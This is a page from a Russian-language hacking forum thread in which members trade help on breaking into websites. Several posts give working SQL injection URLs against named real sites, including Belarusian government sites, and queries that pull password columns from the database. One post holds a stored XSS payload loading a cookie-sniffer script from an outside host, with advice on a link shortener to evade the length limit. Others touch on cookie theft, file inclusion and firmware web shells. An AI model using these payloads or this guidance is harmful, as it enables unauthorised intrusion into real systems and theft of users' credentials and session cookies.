Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. d1v

    d1v Elder - Старейшина

    Регистрация:
    21.02.2009
    Сообщения:
    676
    Одобрения:
    331
    Репутация:
    120
    никак. из-за отсутсвия тэгов просто выпадает кусок js скрипта.
    хотя там есть пассиваная хсс:
    можешь попытаться выташить куки.
     
    #19081 d1v, 22.01.2012
    В последний раз редактировалось: 22.01.2012
  2. Qzen

    Qzen New Member

    Регистрация:
    22.11.2011
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Просканировал сайт Vulnerability сканером нашел уязвимость (ошибка Mysql при ?id=1'), havij позволяет просмотреть все таблицы. А вот в браузере эта ошибка не отображается. Не подскажите почему так?

    зы. Извините за нубовский вопрос.
     
  3. gl0w

    gl0w Member

    Регистрация:
    31.12.2011
    Сообщения:
    59
    Одобрения:
    21
    Репутация:
    5
    В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?
     
  4. Qzen

    Qzen New Member

    Регистрация:
    22.11.2011
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php
    И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью
     
  5. Gorev

    Gorev Level 8

    Регистрация:
    31.03.2006
    Сообщения:
    2 551
    Одобрения:
    1 259
    Репутация:
    274
    пост запросы смотрел?
     
  6. Qzen

    Qzen New Member

    Регистрация:
    22.11.2011
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Скорее всего там ошибка. Только в виду моей нубизны я не знаю как смотреть)
    Не подскажите, может есть какое то дополнение на Firefox для просмотра?
     
  7. gl0w

    gl0w Member

    Регистрация:
    31.12.2011
    Сообщения:
    59
    Одобрения:
    21
    Репутация:
    5
    Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )
    Попробуй выключить редирект
     
    Это одобряет 1 пользователь.
  8. Qzen

    Qzen New Member

    Регистрация:
    22.11.2011
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.
    Спасибо.
     
  9. Boolean

    Boolean Elder - Старейшина

    Регистрация:
    5.09.2010
    Сообщения:
    147
    Одобрения:
    83
    Репутация:
    78
    Ошибки не возникало потому что, в новых версиях FireFox кодирует ' как %27. Нужно патчить. Патч можно скачать тут: https://rdot.org/forum/showthread.php?t=1403
     
  10. er9j6@

    er9j6@ Elder - Старейшина

    Регистрация:
    17.09.2011
    Сообщения:
    393
    Одобрения:
    40
    Репутация:
    23
    Это MySQL?

    _http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Регистрация:
    17.09.2011
    Сообщения:
    393
    Одобрения:
    40
    Репутация:
    23
    Версию вывел, а как сейчас таблицы вывести, подскажите?

    _http://www.oim.by/en/department'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'

    Duplicate column name '5.5.8'
     
  12. justonline

    justonline network ninja

    Регистрация:
    27.07.2011
    Сообщения:
    499
    Одобрения:
    60
    Репутация:
    53
    Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука
    <script src=http://адрес-снифера .ru/js.js></script>
    перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?
     
  13. M_script

    M_script Members of Antichat

    Регистрация:
    4.11.2004
    Сообщения:
    2 581
    Одобрения:
    1 317
    Репутация:
    1 557
    justonline, используй сервис сокращения ссылок
     
    Это одобряют 3 пользоветелей.
  14. pirat0

    pirat0 Member

    Регистрация:
    16.01.2011
    Сообщения:
    71
    Одобрения:
    6
    Репутация:
    -1
    +union+select+1,2,column_name,4,5,6+from+information_schema.columns+where+column_name+Like'%pass%'+limit+0,20+--+
    подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
    например вывел "password" а название таблицы у этой колонки как узнать
     
  15. Konqi

    Konqi Green member

    Регистрация:
    24.06.2009
    Сообщения:
    2 251
    Одобрения:
    1 149
    Репутация:
    886
    union select 1,2,concat(table_name,0x3a,column_name),4,5,6
     
    _________________________
  16. pirat0

    pirat0 Member

    Регистрация:
    16.01.2011
    Сообщения:
    71
    Одобрения:
    6
    Репутация:
    -1
    спосибо, а то название таблиц не стандартное - "a_affiliates"
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 663
    Одобрения:
    916
    Репутация:
    363
    Code:
    http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
    немного не понял ошибку, объясните
     
    _________________________
  18. Boolean

    Boolean Elder - Старейшина

    Регистрация:
    5.09.2010
    Сообщения:
    147
    Одобрения:
    83
    Репутация:
    78
    index.php:
    PHP:
    include 'include/include.php';
    include 
    'some/' $_GET[child] . '.php';
    include/include.php:
    PHP:
    [...]
    function 
    strips(){/*whatever*/}
    [...]
    index.php?
    функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.
     
    Это одобряет 1 пользователь.
  19. gl0w

    gl0w Member

    Регистрация:
    31.12.2011
    Сообщения:
    59
    Одобрения:
    21
    Репутация:
    5
    Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.
    UPD: Konqi уже ответил :) не заметил
     
    #19099 gl0w, 26.01.2012
    В последний раз редактировалось: 26.01.2012
  20. Ro Man

    Ro Man Elder - Старейшина

    Регистрация:
    4.06.2007
    Сообщения:
    30
    Одобрения:
    16
    Репутация:
    0
    возможно ли в прошивку модема адсл вшить веб шелл?
     
Статус темы:
Тема закрыта для ответов.